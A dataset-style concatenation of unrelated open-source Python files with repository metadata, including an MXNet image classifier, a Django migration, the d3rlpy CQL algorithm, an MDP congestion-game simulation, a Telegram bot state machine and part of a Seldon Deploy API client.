comment = "Red flag comment"
)
def test_create(self):
with self.client():
response = self.client().post('/',
data=dumps(self.red_flag_data,datetime_mode=DM_ISO8601,
uuid_mode=UM_CANONICAL), content_type="application/json")
response_data = loads(response.data.decode())
self.assertEqual(response.status_code,201)
self.assertEqual(response.content_type,'application/json')
self.assertEqual(response_data['status'],201)
self.assertEqual(response_data['message'], 'Created red-flag record')
self.assertEqual(isinstance(response_data['message'],str),True)
def test_get_all(self):
with self.client():
response = self.client().post('/',
data=dumps(self.red_flag_data,datetime_mode=DM_ISO8601,
uuid_mode=UM_CANONICAL), content_type="application/json")
response_data = loads(response.data.decode())
self.assertEqual(response.status_code, 201)
request_data = self.client().get('/')
self.assertEqual(request_data.status_code,200)
def test_get_one(self):
with self.client():
response = self.client().post('/',
data=dumps(self.red_flag_data,datetime_mode=DM_ISO8601,
uuid_mode=UM_CANONICAL), content_type="application/json")
json_result = loads(response.data.decode('utf-8').replace("'","\""))
self.assertEqual(response.status_code,201)
if __name__ == '__main__':
unittest.main()
|
[
"matthewscurtis81@gmail.com"
] |
matthewscurtis81@gmail.com
|
48e7fc8b558dd07f858cd8b423266154dce93c74
|
12ed734433de51f1cf7b9d8900f4b831e996a80f
|
/script/execute.py
|
e449dd5d841f86445d703f61803d960627f903e4
|
[] |
no_license
|
TimoBergerbusch/DeepLearningFuerAutonomesFahren
|
7c884d52149ffab9690d3a5d575453ef6d437181
|
04c2161b8833964ee00ad50fa751b92c4dc58ca2
|
refs/heads/master
| 2020-03-13T14:47:00.745716
| 2018-07-03T18:18:21
| 2018-07-03T18:18:21
| 131,165,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,740
|
py
|
import mxnet as mx
path='http://data.mxnet.io/models/imagenet/'
[mx.test_utils.download(path+'resnet/50-layers/resnet-50-0000.params'),
mx.test_utils.download(path+'resnet/50-layers/resnet-50-symbol.json'),
mx.test_utils.download(path+'synset.txt')]
ctx = mx.cpu()
sym, arg_params, aux_params = mx.model.load_checkpoint('resnet-50', 0)
mod = mx.mod.Module(symbol=sym, context=ctx, label_names=None)
mod.bind(for_training=False, data_shapes=[('data', (1,3,224,224))],
label_shapes=mod._label_shapes)
mod.set_params(arg_params, aux_params, allow_missing=True)
with open('synset.txt', 'r') as f:
labels = [l.rstrip() for l in f]
import matplotlib.pyplot as plt
import numpy as np
# define a simple data batch
from collections import namedtuple
Batch = namedtuple('Batch', ['data'])
def get_image(url, show=False):
# download and show the image
fname = mx.test_utils.download(url)
img = mx.image.imread(fname)
if img is None:
return None
if show:
plt.imshow(img.asnumpy())
plt.axis('off')
# convert into format (batch, RGB, width, height)
img = mx.image.imresize(img, 224, 224) # resize
img = img.transpose((2, 0, 1)) # Channel first
img = img.expand_dims(axis=0) # batchify
return img
def predict(url):
img = get_image(url, show=True)
# compute the predict probabilities
mod.forward(Batch([img]))
prob = mod.get_outputs()[0].asnumpy()
# print the top-5
prob = np.squeeze(prob)
a = np.argsort(prob)[::-1]
for i in a[0:5]:
print('probability=%f, class=%s' %(prob[i], labels[i]))
#predict('https://github.com/dmlc/web-data/blob/master/mxnet/doc/tutorials/python/predict_image/cat.jpg?raw=true')
loop = True
my_map = {"pic2" : 'https://github.com/dmlc/web-data/blob/master/mxnet/doc/tutorials/python/predict_image/cat.jpg?raw=true',
"pic1" : 'https://github.com/dmlc/web-data/blob/master/mxnet/doc/tutorials/python/predict_image/dog.jpg?raw=true',
"pic5" : 'https://i.ytimg.com/vi/dOULgRg0Sf8/maxresdefault.jpg?raw=true',
"pic3" : 'http://www.daftrucks.de/~/media/images/daf%20trucks/online%20truck%20configurator/background/backgroundvisual.jpg?h=1184&w=1875&la=de-DE?raw=true',
"pic4" : 'https://i.ebayimg.com/00/s/NjcxWDEwMjQ=/z/q~IAAOSwkEVXGp5B/$_72.JPG?raw=true',
"pic6" : 'https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/2/2017/01/Orbea-gain.jpeg?raw=true',
"shit" : 'https://telebasel.ch/wp-content/uploads/2017/09/wut6hxr.jpg?raw=true'}
while loop:
name = raw_input("Name of Image to classify: ")
if name == "exit":
loop = False
else:
if name in my_map:
url = my_map[name];
predict(url)
|
[
"timo-bergerbusch@web.de"
] |
timo-bergerbusch@web.de
|
d77213cb938364654b4537ff2566cb0d30598b49
|
12bbad5d5f81f0c9b11fc9db3dee69b901f44469
|
/api/migrations/0006_auto_20201022_0439.py
|
9184a6a2dc892b48f822049a0a024cb18eda13e1
|
[] |
no_license
|
youflox/news
|
d5e0432e57093d6f4c49015d361ffe01cbd1c48e
|
e0e829727ac046f36fdeaf9335002c1c2c83684d
|
refs/heads/master
| 2023-01-08T21:07:11.295421
| 2020-11-06T07:47:57
| 2020-11-06T07:47:57
| 309,968,222
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
# Generated by Django 3.1.2 on 2020-10-21 23:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0005_article_image'),
]
operations = [
migrations.AlterField(
model_name='article',
name='image',
field=models.ImageField(upload_to='images'),
),
]
|
[
"youflox@gmail.com"
] |
youflox@gmail.com
|
8fca3250922d478ef9165789a3684f85de825780
|
56419dc6dc955a0c87fe13d95f318b7819217317
|
/d3rlpy/algos/torch/cql_impl.py
|
6dadeb6912841b35aa1de0c3bec784c1b4f66a48
|
[
"MIT"
] |
permissive
|
Mobius1D/d3rlpy
|
85f67f8380dd11836b61dceadc550fa8083341cc
|
f279245e3c8dcd89bd8c8abafcfdf1dff50b7fce
|
refs/heads/master
| 2023-06-19T11:36:06.518270
| 2021-07-09T20:53:40
| 2021-07-09T20:53:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,912
|
py
|
import math
from typing import Optional, Sequence
import numpy as np
import torch
import torch.nn.functional as F
from torch.optim import Optimizer
from ...gpu import Device
from ...models.builders import create_parameter
from ...models.encoders import EncoderFactory
from ...models.optimizers import OptimizerFactory
from ...models.q_functions import QFunctionFactory
from ...models.torch import Parameter
from ...preprocessing import ActionScaler, Scaler
from ...torch_utility import TorchMiniBatch, torch_api, train_api
from .dqn_impl import DoubleDQNImpl
from .sac_impl import SACImpl
class CQLImpl(SACImpl):
_alpha_learning_rate: float
_alpha_optim_factory: OptimizerFactory
_initial_alpha: float
_alpha_threshold: float
_conservative_weight: float
_n_action_samples: int
_soft_q_backup: bool
_log_alpha: Optional[Parameter]
_alpha_optim: Optional[Optimizer]
def __init__(
self,
observation_shape: Sequence[int],
action_size: int,
actor_learning_rate: float,
critic_learning_rate: float,
temp_learning_rate: float,
alpha_learning_rate: float,
actor_optim_factory: OptimizerFactory,
critic_optim_factory: OptimizerFactory,
temp_optim_factory: OptimizerFactory,
alpha_optim_factory: OptimizerFactory,
actor_encoder_factory: EncoderFactory,
critic_encoder_factory: EncoderFactory,
q_func_factory: QFunctionFactory,
gamma: float,
tau: float,
n_critics: int,
target_reduction_type: str,
initial_temperature: float,
initial_alpha: float,
alpha_threshold: float,
conservative_weight: float,
n_action_samples: int,
soft_q_backup: bool,
use_gpu: Optional[Device],
scaler: Optional[Scaler],
action_scaler: Optional[ActionScaler],
):
super().__init__(
observation_shape=observation_shape,
action_size=action_size,
actor_learning_rate=actor_learning_rate,
critic_learning_rate=critic_learning_rate,
temp_learning_rate=temp_learning_rate,
actor_optim_factory=actor_optim_factory,
critic_optim_factory=critic_optim_factory,
temp_optim_factory=temp_optim_factory,
actor_encoder_factory=actor_encoder_factory,
critic_encoder_factory=critic_encoder_factory,
q_func_factory=q_func_factory,
gamma=gamma,
tau=tau,
n_critics=n_critics,
target_reduction_type=target_reduction_type,
initial_temperature=initial_temperature,
use_gpu=use_gpu,
scaler=scaler,
action_scaler=action_scaler,
)
self._alpha_learning_rate = alpha_learning_rate
self._alpha_optim_factory = alpha_optim_factory
self._initial_alpha = initial_alpha
self._alpha_threshold = alpha_threshold
self._conservative_weight = conservative_weight
self._n_action_samples = n_action_samples
self._soft_q_backup = soft_q_backup
# initialized in build
self._log_alpha = None
self._alpha_optim = None
def build(self) -> None:
self._build_alpha()
super().build()
self._build_alpha_optim()
def _build_alpha(self) -> None:
initial_val = math.log(self._initial_alpha)
self._log_alpha = create_parameter((1, 1), initial_val)
def _build_alpha_optim(self) -> None:
assert self._log_alpha is not None
self._alpha_optim = self._alpha_optim_factory.create(
self._log_alpha.parameters(), lr=self._alpha_learning_rate
)
def compute_critic_loss(
self, batch: TorchMiniBatch, q_tpn: torch.Tensor
) -> torch.Tensor:
loss = super().compute_critic_loss(batch, q_tpn)
conservative_loss = self._compute_conservative_loss(
batch.observations, batch.actions, batch.next_observations
)
return loss + conservative_loss
@train_api
@torch_api()
def update_alpha(self, batch: TorchMiniBatch) -> np.ndarray:
assert self._alpha_optim is not None
assert self._q_func is not None
assert self._log_alpha is not None
# Q function should be inference mode for stability
self._q_func.eval()
self._alpha_optim.zero_grad()
# the original implementation does scale the loss value
loss = -self._compute_conservative_loss(
batch.observations, batch.actions, batch.next_observations
)
loss.backward()
self._alpha_optim.step()
cur_alpha = self._log_alpha().exp().cpu().detach().numpy()[0][0]
return loss.cpu().detach().numpy(), cur_alpha
def _compute_policy_is_values(
self, policy_obs: torch.Tensor, value_obs: torch.Tensor
) -> torch.Tensor:
assert self._policy is not None
assert self._q_func is not None
with torch.no_grad():
policy_actions, n_log_probs = self._policy.sample_n_with_log_prob(
policy_obs, self._n_action_samples
)
obs_shape = value_obs.shape
repeated_obs = value_obs.expand(self._n_action_samples, *obs_shape)
# (n, batch, observation) -> (batch, n, observation)
transposed_obs = repeated_obs.transpose(0, 1)
# (batch, n, observation) -> (batch * n, observation)
flat_obs = transposed_obs.reshape(-1, *obs_shape[1:])
# (batch, n, action) -> (batch * n, action)
flat_policy_acts = policy_actions.reshape(-1, self.action_size)
# estimate action-values for policy actions
policy_values = self._q_func(flat_obs, flat_policy_acts, "none")
policy_values = policy_values.view(
self._n_critics, obs_shape[0], self._n_action_samples
)
log_probs = n_log_probs.view(1, -1, self._n_action_samples)
# importance sampling
return policy_values - log_probs
def _compute_random_is_values(self, obs: torch.Tensor) -> torch.Tensor:
assert self._q_func is not None
repeated_obs = obs.expand(self._n_action_samples, *obs.shape)
# (n, batch, observation) -> (batch, n, observation)
transposed_obs = repeated_obs.transpose(0, 1)
# (batch, n, observation) -> (batch * n, observation)
flat_obs = transposed_obs.reshape(-1, *obs.shape[1:])
# estimate action-values for actions from uniform distribution
# uniform distribution between [-1.0, 1.0]
flat_shape = (obs.shape[0] * self._n_action_samples, self._action_size)
zero_tensor = torch.zeros(flat_shape, device=self._device)
random_actions = zero_tensor.uniform_(-1.0, 1.0)
random_values = self._q_func(flat_obs, random_actions, "none")
random_values = random_values.view(
self._n_critics, obs.shape[0], self._n_action_samples
)
random_log_probs = math.log(0.5 ** self._action_size)
# importance sampling
return random_values - random_log_probs
def _compute_conservative_loss(
self, obs_t: torch.Tensor, act_t: torch.Tensor, obs_tp1: torch.Tensor
) -> torch.Tensor:
assert self._policy is not None
assert self._q_func is not None
assert self._log_alpha is not None
policy_values_t = self._compute_policy_is_values(obs_t, obs_t)
policy_values_tp1 = self._compute_policy_is_values(obs_tp1, obs_t)
random_values = self._compute_random_is_values(obs_t)
# compute logsumexp
# (n critics, batch, 3 * n samples) -> (n critics, batch, 1)
target_values = torch.cat(
[policy_values_t, policy_values_tp1, random_values], dim=2
)
logsumexp = torch.logsumexp(target_values, dim=2, keepdim=True)
# estimate action-values for data actions
data_values = self._q_func(obs_t, act_t, "none")
loss = logsumexp.mean(dim=0).mean() - data_values.mean(dim=0).mean()
scaled_loss = self._conservative_weight * loss
# clip for stability
clipped_alpha = self._log_alpha().exp().clamp(0, 1e6)[0][0]
return clipped_alpha * (scaled_loss - self._alpha_threshold)
def compute_target(self, batch: TorchMiniBatch) -> torch.Tensor:
if self._soft_q_backup:
target_value = super().compute_target(batch)
else:
target_value = self._compute_deterministic_target(batch)
return target_value
def _compute_deterministic_target(
self, batch: TorchMiniBatch
) -> torch.Tensor:
assert self._policy
assert self._targ_q_func
with torch.no_grad():
action = self._policy.best_action(batch.next_observations)
return self._targ_q_func.compute_target(
batch.next_observations,
action,
reduction=self._target_reduction_type,
)
class DiscreteCQLImpl(DoubleDQNImpl):
_alpha: float
def __init__(
self,
observation_shape: Sequence[int],
action_size: int,
learning_rate: float,
optim_factory: OptimizerFactory,
encoder_factory: EncoderFactory,
q_func_factory: QFunctionFactory,
gamma: float,
n_critics: int,
target_reduction_type: str,
alpha: float,
use_gpu: Optional[Device],
scaler: Optional[Scaler],
):
super().__init__(
observation_shape=observation_shape,
action_size=action_size,
learning_rate=learning_rate,
optim_factory=optim_factory,
encoder_factory=encoder_factory,
q_func_factory=q_func_factory,
gamma=gamma,
n_critics=n_critics,
target_reduction_type=target_reduction_type,
use_gpu=use_gpu,
scaler=scaler,
)
self._alpha = alpha
def compute_loss(
self,
batch: TorchMiniBatch,
q_tpn: torch.Tensor,
) -> torch.Tensor:
loss = super().compute_loss(batch, q_tpn)
conservative_loss = self._compute_conservative_loss(
batch.observations, batch.actions.long()
)
return loss + self._alpha * conservative_loss
def _compute_conservative_loss(
self, obs_t: torch.Tensor, act_t: torch.Tensor
) -> torch.Tensor:
assert self._q_func is not None
# compute logsumexp
policy_values = self._q_func(obs_t)
logsumexp = torch.logsumexp(policy_values, dim=1, keepdim=True)
# estimate action-values under data distribution
one_hot = F.one_hot(act_t.view(-1), num_classes=self.action_size)
data_values = (self._q_func(obs_t) * one_hot).sum(dim=1, keepdim=True)
return (logsumexp - data_values).mean()
|
[
"takuma.seno@gmail.com"
] |
takuma.seno@gmail.com
|
49c911a5de0008425794db6a96232f235ca75f7d
|
9fdb325cf3fd1c469e5cad853ad8bf1a604b44c7
|
/netlabproject/wsgi.py
|
5aab4c221593ea4bcdd402cc3fe39b9019c113bd
|
[] |
no_license
|
abkristanto/photatoes-django
|
3290e5a4c246eab19187fcc51899e0bee727beed
|
b40a20c37e4141a8fd5503c94b9d243ace545369
|
refs/heads/master
| 2023-04-03T14:44:18.499511
| 2021-04-10T16:14:24
| 2021-04-10T16:14:24
| 356,628,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for netlabproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'netlabproject.settings')
application = get_wsgi_application()
|
[
"abkristanto@gmail.com"
] |
abkristanto@gmail.com
|
fac7ca009bd5cd773c1943f1dfee737a0cbdee65
|
4ca0b9d8beec6d4ac2ac64b53429b298b7819311
|
/mdp_congestion_game_col_avoidance.py
|
a083cd73744f554f44cc46c759394260d759a62d
|
[] |
no_license
|
lisarah/mdp
|
36097040f7b6d80d9eddb044c644cd0d6ab005e0
|
fc6915aad79e6f9525d485c6fe00bf0d98ca8f53
|
refs/heads/master
| 2022-06-09T15:46:48.335282
| 2022-06-02T02:56:30
| 2022-06-02T02:56:30
| 207,250,240
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,782
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 2 17:22:30 2021
@author: Sarah Li
"""
import numpy as np
import visualization as vs
import util as ut
import matplotlib.pyplot as plt
import dynamicProg as dp
import random
np.random.seed(121)
Columns = 10
Rows = 5
A = 4
T = 100
P = ut.nonErgodicMDP(Rows, Columns, p=0.98)
player_num = 3
C = [np.ones((Rows* Columns, A, T+1)) for _ in range(player_num)]
def update_cost(y):
congestion_cost = np.zeros((Rows*Columns, A, T+1))
for x_ind in range(Columns):
for y_ind in range(Rows):
unwrap_ind = (y_ind * Columns + x_ind)
for t in range(T+1):
congestion_cost[unwrap_ind,:, t] += np.sum(
y[unwrap_ind * A:(unwrap_ind + 1) * A, t])
return congestion_cost
def update_y(policy, x_0): # policy should be 1D array
x = np.zeros((Rows*Columns, T+1))
x[:, 0] = x_0
y = np.zeros((Rows*Columns*A, T+1))
for t in range(T):
markov_chain = P.dot(policy[:,:,t].T)
x[:, t+1] = markov_chain.dot(x[:, t])
for s in range(Rows*Columns):
y[s*A:(s + 1)*A, t] = x[s, t] * policy[s, s*A:(s + 1)*A, t]
for s in range(Rows*Columns):
y[s*A:(s + 1)*A, T] = x[s, T] / A
# print(np.round(x[:,T],2))
# print(x[:,T].shape)
# print(np.sum(x[:,T]))
return y
target_col = [9, 7, 2]# , 4, 0, 5, 1
target_row = Rows - 1
for p in range(player_num):
C[p][target_row*Columns + target_col[p], :, :] = 0.
policy = ut.random_initial_policy_finite(Rows, Columns, A, T, player_num)
initial_x = [np.zeros(Rows*Columns) for _ in range(player_num)]
x_init_state = random.sample(range(Columns), player_num)
x = [[] for _ in range(player_num)]
for p in range(player_num):
initial_x[p][x_init_state[p]] = 1.
x[p].append(update_y(policy[:,:,:,p], initial_x[p]))
# col_div = int(Columns/player_num* A)
# for p in range(player_num):
# initial_x[p][col_div*p:col_div *(p+1)] = 1./col_div
# x[p].append(update_y(policy[:,:,:,p], initial_x[p]))
actions = [[] for _ in range(player_num)]
for p in range(player_num):
for s in range(Rows*Columns):
p_action, = np.where(policy[s, s*A:(s+1)*A, 0, p] == 1.)
# print(f' action is {policy[s, s*A:(s+1)*A, 0, p] }')
if len(p_action) > 0:
actions[p].append(p_action[0])
else:
actions[p].append(0)
# draw initial policy for player zero
axis, value_grids, _ = vs.init_grid_plot(Rows, Columns, list(np.sum(C[0][:,:,0],axis=1))+[4])
vs.draw_policies(Rows, Columns, actions[0], axis)
Iterations = 30
V_hist= [[] for _ in range(player_num)]
costs = [[] for _ in range(player_num)]
gamma = 0.9
step_size = []
# y_lists = [[y[p]]]
# y_1_list = [y_1]
# y_2_list = [y_2]
for i in range(Iterations):
step_size.append(1/(i+1))
for i in range(Iterations):
next_distribution = []
next_policy = []
for p in range(player_num):
y = sum([x[p][-1] for p in range(player_num)])
p_cost = C[p] + 1.25 * update_cost(y) # 1.25
costs[p].append(1*p_cost)
V, pol_new = dp.value_iteration_finite(P, 1*p_cost, g=gamma)
next_policy.append(pol_new)
for p in range(player_num):
policy[:,:,:,p] = (1 - step_size[i]) * policy[:,:,:,p] + step_size[i] * next_policy[p]
V_hist[p].append(list(ut.value_finite(P, policy[:,:,:,p], 1*p_cost, gamma)))
# new_y1 =
# new_y2 = update_y(policy[:,:,:,1], initial_x_2)
[x[p].append(update_y(policy[:,:,:,p], initial_x[p])) for p in range(player_num)]
# y_2_list.append(1*new_y2)
# ---------------- if plotting initial steps of frank-wolfe ------------#
plot_frank_wolfe = False # this only works if Iterations = 1
player = 1
plot_time = T - 1
if plot_frank_wolfe:
cost_plot, val_grids, _ = vs.init_grid_plot(
Rows, Columns, list(np.sum(costs[-1][:,:,plot_time],axis=1)))
dp_policy = []
original_policy = []
for s in range(Rows*Columns):
pol, = np.where(policy[s, s*A:(s+1)*A,plot_time, player] == 1)
original_policy.append(pol[0])
pol, = np.where(next_policy[player][s, s*A:(s+1)*A,plot_time] == 1)
dp_policy.append(pol[0])
vs.draw_policies(Rows, Columns,next_policy, cost_plot)
# vs.draw_policies_interpolate(Rows, Columns,dp_policy, actions_1, cost_plot)
plt.show()
V_hist_array = np.array(V_hist) # player, Iterations(alg), states, Timesteps+1
plt.figure()
plt.title('state values')
for s in range(Rows*Columns):
plt.plot(V_hist_array[0,-1, s, :])
plt.show()
cost_array = [np.array(costs[p]) for p in range(player_num)]
for p in range(player_num):
plt.figure()
plt.title(f'player {p} costs')
for s in range(Rows*Columns):
plt.plot(np.sum(cost_array[p][:, s, :,T-1], axis=1))
plt.show()
# p1_costs = list(np.sum(cost_array[33, :,:,T-1],axis=1))
p1_costs = list(np.sum(cost_array[0][Iterations - 1, :,:,T],axis=1))
p1_values = V_hist_array[0,Iterations - 1, :, T-1]
total_player_costs = np.zeros(Columns * Rows)
target_col = [9, 7, 2, 4, 0] #, 1, 5
target_row = Rows - 1
for t_col in target_col:
total_player_costs[target_row*Columns + t_col] = 1.
color_map, norm, _ = vs.color_map_gen(total_player_costs)
ax, value_grids, f = vs.init_grid_plot(Rows, Columns, total_player_costs)
plt.show()
p_inits = [np.random.randint(0, Columns - 1) for p in range(player_num)]
# p1_init = np.random.randint(0, Columns - 1) # start randomly in the top row
# p2_init = np.random.randint(0, Columns - 1) # start randomly in the top row
# vs.simulate(p1_init, p2_init, policy, p1_values, value_grids, A,
# Rows, Columns, P, Time = T)
print('visualizing now')
vs.animate_traj('traj_ouput.mp4', f, p_inits, policy, total_player_costs,
value_grids, A, Rows, Columns, P, Time = T)
# # v_max_1 = np.max(V_hist_array[0, -1, :])
# # v_min_1 = np.min(V_hist_array[0, -1, :])
# # # v_max_2 = np.max(V_hist_array[1, -1, :])
# # # v_min_2 = np.min(V_hist_array[1, -1, :])
# # norm_1 = mpl.colors.Normalize(vmin=v_min_1, vmax=v_max_1)
# # # norm_2 = mpl.colors.Normalize(vmin=v_min_2, vmax=v_max_2)
# # color_map = plt.get_cmap('coolwarm')
# # f_1, axis_1 = plt.subplots(1)
# # value_grids_1 = []
# # for x_ind in range(Rows):
# # value_grids_1.append([])
# # for y_ind in range(Columns):
# # R,G,B,_ = color_map(norm_1((V_hist_array[0, -1, x_ind*Columns+ y_ind])))
# # color = [R,G,B]
# # value_grids_1[-1].append(plt.Rectangle((y_ind, x_ind), 1, 1,
# # fc=color, ec='xkcd:greyish blue'))
# # axis_1.add_patch(value_grids_1[-1][-1])
# # plt.axis('scaled')
# # axis_1.xaxis.set_visible(False)
# # axis_1.yaxis.set_visible(False)
|
[
"crab.apples00@gmail.com"
] |
crab.apples00@gmail.com
|
e5e0604d2d3fa39230cbda76d99c4414a162dd4e
|
252bc6452fea2cd61f86f23542001b51b90541a8
|
/fsm.py
|
d1d38936e290adb611d8ec256f83aa39abd34cb7
|
[] |
no_license
|
baronrustamov/Toc-project-telegram-chatbot-with-api.ai
|
656853e30c1180cf30201b86882816721d2853e7
|
9ea7dae87bf4902f17cb7e48b623bcf38345c906
|
refs/heads/master
| 2023-05-28T06:46:55.535456
| 2017-06-14T13:59:31
| 2017-06-14T13:59:31
| 345,258,432
| 0
| 0
| null | 2023-05-01T19:53:42
| 2021-03-07T04:31:33
| null |
UTF-8
|
Python
| false
| false
| 4,368
|
py
|
from transitions.extensions import GraphMachine
class TocMachine(GraphMachine):
def __init__(self, **machine_configs):
self.machine = GraphMachine(
model = self,
**machine_configs
)
def is_going_to_state1(self, update):
text = update.message.text
##print("check1")
return text == 'find_album_from_state0'
def is_going_to_state2(self, update):
text = update.message.text
#print("check2")
return text == 'show_recommendation_from_state0'
def is_going_to_state3(self, update):
text = update.message.text
return text == 'top_track_from_state0'
def is_going_to_state4(self, update):
text = update.message.text
#print ("check 4 ")
return text == 'find_album_by_enter_singer'
def is_going_to_state5(self, update):
text = update.message.text
#print ("check 5 ")
return text == 'list_song_by_album_name'
def is_going_to_state6(self, update):
text = update.message.text
#print ("check 6 ")
return text == 'play_music'
def is_going_to_state7(self, update):
text = update.message.text
#print ("check 7 ")
return text == 'recommend_by_singer'
def is_going_to_state8(self, update):
text = update.message.text
#print ("check 8 ")
return text == 'play_music'
def is_going_to_state9(self, update):
text = update.message.text
#print ("check 9 ")
return text == 'find_album_by_enter_singer'
def is_going_to_state10(self, update):
text = update.message.text
#print ("check 10 ")
return text == 'play_music'
def on_enter_state1(self,update):
print("enter state 1")
update.message.reply_text("(I'm entering state1)\nPlease enter the singer\n I will list all the album by this artist")
#self.go_back(update)
def on_exit_state1(self, update):
print('Leaving state1')
def on_enter_state2(self, update):
update.message.reply_text("(I'm entering state2)\nPlease enter your favorite singer\nI will recommend some similiar song for you\nThe input format need to be 'recommended by singer' ")
#self.go_back(update)
def on_exit_state2(self, update):
print('Leaving state2')
def on_enter_state3(self, update):
update.message.reply_text("(I'm entering state3)\nPlease enter the singer\n I will show his(her) top 10 tracks. ")
#self.go_back(update)
def on_exit_state3(self, update):
print('Leaving state3')
def on_enter_state4(self, update):
update.message.reply_text("(I'm entering state4)\nPlease enter the album you want .I will list all the song in the album for u")
#self.go_back(update)
def on_exit_state4(self, update):
print('Leaving state4')
def on_enter_state5(self, update):
update.message.reply_text("(I'm entering state5)\nI'll list all the song in the album!!")
#self.go_back(update)
def on_exit_state5(self, update):
print('Leaving state5')
def on_enter_state6(self, update):
update.message.reply_text("(I'm entering state6)\nI'll open the spotify app for you")
#self.go_back(update)
def on_exit_state6(self, update):
#self.go_back(update)
print('Leaving state6')
def on_enter_state7(self, update):
update.message.reply_text("(I'm entering state7)\n")
#self.go_back(update)
def on_exit_state7(self, update):
print('Leaving state7')
def on_enter_state8(self, update):
update.message.reply_text("(I'm entering state8)\nI'll open the spotify app for you")
#self.go_back(update)
def on_exit_state8(self, update):
print('Leaving state8')
def on_enter_state9(self, update):
update.message.reply_text("(I'm entering state9)\n")
#self.go_back(update)
def on_exit_state9(self, update):
print('Leaving state9')
def on_enter_state10(self, update):
update.message.reply_text("(I'm entering state10)\nI'll open the spotify app for you")
#self.go_back(update)
def on_exit_state10(self, update):
print('Leaving state10')
|
[
"cloudstrife60138@gmail.com"
] |
cloudstrife60138@gmail.com
|
ea1421d3eef4bc9eefc004968959b201b28dc4d2
|
c927b1b9adc0670c3111cd8e4f1285ffd4e54cef
|
/python/seldon_deploy_sdk/api/batch_jobs_api.py
|
70fa4a370ec85fa13f3d48a4bd6215262c1b51b8
|
[
"Apache-2.0"
] |
permissive
|
FarrandTom/seldon-deploy-client
|
79d92224a69ef9241b73154e20aaa38b9e049cf4
|
bfc0dd958743f395b8b781b2e8216cc5f8f9e749
|
refs/heads/master
| 2023-01-20T00:24:15.768347
| 2020-11-26T09:34:05
| 2020-11-26T09:34:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,340
|
py
|
# coding: utf-8
"""
Seldon Deploy API
API to interact and manage the lifecycle of your machine learning models deployed through Seldon Deploy. # noqa: E501
OpenAPI spec version: v1alpha1
Contact: hello@seldon.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from seldon_deploy_sdk.api_client import ApiClient
class BatchJobsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_seldon_deployment_batch_job(self, name, namespace, workflow, **kwargs): # noqa: E501
"""create_seldon_deployment_batch_job # noqa: E501
Create the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_seldon_deployment_batch_job(name, namespace, workflow, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param BatchDefinition workflow: WorkflowName (required)
:return: UID
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_seldon_deployment_batch_job_with_http_info(name, namespace, workflow, **kwargs) # noqa: E501
else:
(data) = self.create_seldon_deployment_batch_job_with_http_info(name, namespace, workflow, **kwargs) # noqa: E501
return data
def create_seldon_deployment_batch_job_with_http_info(self, name, namespace, workflow, **kwargs): # noqa: E501
"""create_seldon_deployment_batch_job # noqa: E501
Create the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_seldon_deployment_batch_job_with_http_info(name, namespace, workflow, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param BatchDefinition workflow: WorkflowName (required)
:return: UID
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'workflow'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_seldon_deployment_batch_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `create_seldon_deployment_batch_job`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_seldon_deployment_batch_job`") # noqa: E501
# verify the required parameter 'workflow' is set
if ('workflow' not in params or
params['workflow'] is None):
raise ValueError("Missing the required parameter `workflow` when calling `create_seldon_deployment_batch_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'workflow' in params:
body_params = params['workflow']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}/batchjobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UID', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
